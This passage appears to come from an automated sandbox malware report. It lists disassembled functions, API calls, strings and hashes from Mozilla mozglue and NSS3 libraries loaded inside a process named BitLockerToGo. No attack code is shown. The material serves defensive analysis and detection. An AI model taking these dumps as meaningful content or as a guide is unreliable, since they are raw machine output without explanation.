                                                                                                                                                                                                                                                                                                                    • Compile-time page size does not divide the runtime one., xrefs: 6C9B3946
                                                                                                                                                                                                                                                                                                                    • MOZ_RELEASE_ASSERT(mNode), xrefs: 6C9B3559, 6C9B382D, 6C9B3848
                                                                                                                                                                                                                                                                                                                    • MOZ_CRASH(), xrefs: 6C9B3950
                                                                                                                                                                                                                                                                                                                    • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C9B3793
                                                                                                                                                                                                                                                                                                                    • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C9B37A8
                                                                                                                                                                                                                                                                                                                    • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C9B37D2
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
                                                                                                                                                                                                                                                                                                                    • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                                                                                                                                                                    • API String ID: 3040639385-4173974723
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 12c3233e7c4a17476f6e516574b26c61c68e66608b58fed9c0cc290e31f0b69c
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 153f1201138f6da1deb89fc653e4902c8a1fdb8b38952ea007bf59047c458304
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12c3233e7c4a17476f6e516574b26c61c68e66608b58fed9c0cc290e31f0b69c
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8539D71A05B019FC304CF29C540616FBE5FF8A728F29C6ADE869AB791D771E841CB81
                                                                                                                                                                                                                                                                                                                    Function 6C9D34A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3527
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D355B
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D35BC
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D35E0
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D363A
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3693
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D36CD
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3703
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D373C
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3775
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D378F
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3892
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D38BB
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3902
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3939
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3970
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D39EF
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3A26
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3AE5
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3E85
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3EBA
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3EE2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9D6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C9D61DD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9D6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C9D622C
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D40F9
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D412F
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D4157
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9D6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C9D6250
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9D6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9D6292
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D441B
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D4448
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C9D484E
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C9D4863
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C9D4878
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C9D4896
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE ref: 6C9D489F
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: floor$free$malloc$memcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3842999660-3916222277
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 05ec98801ab73339c9909d49784bba0e108b577147f6dfed8a9945bb9974c7d1
                                                                                                                                                                                                                                                                                                                    • Instruction ID: a32a1fec539c48a66391695e9bf28a1f951960840ba79e9ad750ac68345943af
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05ec98801ab73339c9909d49784bba0e108b577147f6dfed8a9945bb9974c7d1
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2F24A74908B808FC761CF28C08469AFBF1BFD9348F158A5ED99997711DB31E896CB42
                                                                                                                                                                                                                                                                                                                    Function 6CAB6D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,6CBBA8EC,0000006C), ref: 6CAB6DC6
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,6CBBA958,0000006C), ref: 6CAB6DDB
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,6CBBA9C4,00000078), ref: 6CAB6DF1
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,6CBBAA3C,0000006C), ref: 6CAB6E06
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,6CBBAAA8,00000060), ref: 6CAB6E1C
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAB6E38
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB3C2BF
                                                                                                                                                                                                                                                                                                                    • PK11_DoesMechanism.NSS3(?,?), ref: 6CAB6E76
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAB726F
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAB7283
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
                                                                                                                                                                                                                                                                                                                    • String ID: !
                                                                                                                                                                                                                                                                                                                    • API String ID: 3333340300-2657877971
                                                                                                                                                                                                                                                                                                                    • Opcode ID: be4fbda69924abbdefb57c41bb3067b9a18b35fbff3bdcb85a1cde692392293e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 87f982c79e9f0ab88fd6443db71cc57d09e14bd378f82829fe15ec69bae55e05
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be4fbda69924abbdefb57c41bb3067b9a18b35fbff3bdcb85a1cde692392293e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96728D75D052199FDB60DF28DC88B9ABBB5BF48304F1441A9E80DA7701EB71AAC4CF91
                                                                                                                                                                                                                                                                                                                    Function 6C9864C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C9864DF
                                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C9864F2
                                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C986505
                                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C986518
                                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C98652B
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C98671C
                                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C986724
                                                                                                                                                                                                                                                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C98672F
                                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C986759
                                                                                                                                                                                                                                                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C986764
                                                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C986A80
                                                                                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C986ABE
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C986AD3
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C986AE8
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C986AF7
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                                                                                                                                                                                                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                                                                                                                                                                                                                    • API String ID: 487479824-2878602165
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 70b63c23692b3200ba74d0d182bee171e7945d0474fb349646532da8d483d02e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ab60888270dda105ff521e41951c31cf7b627af4a75afd2c426f7f8ff0d579ae
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70b63c23692b3200ba74d0d182bee171e7945d0474fb349646532da8d483d02e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4F103709162199FCF20CF64DC88B9AB7B9AF45318F1446D9D819EB680D731EE84CF90
                                                                                                                                                                                                                                                                                                                    Function 6CAFAC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaMark_Util.NSS3(?), ref: 6CAFACC4
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6CAFACD5
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6CAFACF3
                                                                                                                                                                                                                                                                                                                    • SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6CAFAD3B
                                                                                                                                                                                                                                                                                                                    • SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6CAFADC8
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAFADDF
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAFADF0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB3C2BF
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAFB06A
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAFB08C
                                                                                                                                                                                                                                                                                                                    • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CAFB1BA
                                                                                                                                                                                                                                                                                                                    • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CAFB27C
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00002010), ref: 6CAFB2CA
                                                                                                                                                                                                                                                                                                                    • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAFB3C1
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAFB40C
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1285963562-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4ba3be511d1eb61e8a947c37e6c1482639ffdcb3955814337868d2b17b27cbfe
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3fc462456e3e7315c193f81b64d46ce4f6efa31971ca629f1550dd4d21bcd03e
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ba3be511d1eb61e8a947c37e6c1482639ffdcb3955814337868d2b17b27cbfe
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A722A071904301AFE710CF14DD44B9A77F1AF84308F28862CF9695B791E772E89ACB96
                                                                                                                                                                                                                                                                                                                    Function 6C9DC4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9DC5F9
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9DC6FB
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C9DC74D
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C9DC7DE
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00004014), ref: 6C9DC9D5
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9DCC76
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C9DCD7A
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9DDB40
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C9DDB62
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C9DDB99
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9DDD8B
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C9DDE95
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C9DE360
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9DE432
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C9DE472
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3d2329beb5f0d8ed183d8b33f0b23752c4fec2583ad89a5c84b2b37412453b1d
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5338D72E0061A8FCB04CFA8C8806ADBBB2FF49314F198269D955BB755D731F945CBA0
                                                                                                                                                                                                                                                                                                                    Function 6CA7ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • sqlite3_initialize.NSS3 ref: 6CA7ED38
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA14F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA14FC4
                                                                                                                                                                                                                                                                                                                    • sqlite3_mprintf.NSS3(snippet), ref: 6CA7EF3C
                                                                                                                                                                                                                                                                                                                    • sqlite3_mprintf.NSS3(offsets), ref: 6CA7EFE4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6CA15001,?,00000003,00000000), ref: 6CB3DFD7
                                                                                                                                                                                                                                                                                                                    • sqlite3_mprintf.NSS3(matchinfo), ref: 6CA7F087
                                                                                                                                                                                                                                                                                                                    • sqlite3_mprintf.NSS3(matchinfo), ref: 6CA7F129
                                                                                                                                                                                                                                                                                                                    • sqlite3_mprintf.NSS3(optimize), ref: 6CA7F1D1
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?), ref: 6CA7F368
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
                                                                                                                                                                                                                                                                                                                    • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                                                                                                                                                                                                                                                                                    • API String ID: 2518200370-449611708
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2622a1888e423d815c37cd143a381581bd538d014dca2cd8b7dcfea5446c9bc3
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8cc59f9b9a12b87e3b02f5e5cc9176a356fd10aea54eec8f3c0729303e0fb73a
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2622a1888e423d815c37cd143a381581bd538d014dca2cd8b7dcfea5446c9bc3
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 720204B9B043404BE7149F35AC8573F36B57BC5708F18453CD86997B05EB34EA8987A2
                                                                                                                                                                                                                                                                                                                    Function 6C99ED10 Relevance: 25.4, APIs: 16, Instructions: 5407COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C99EE7A
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C99EFB5
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C9A1695
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9A16B4
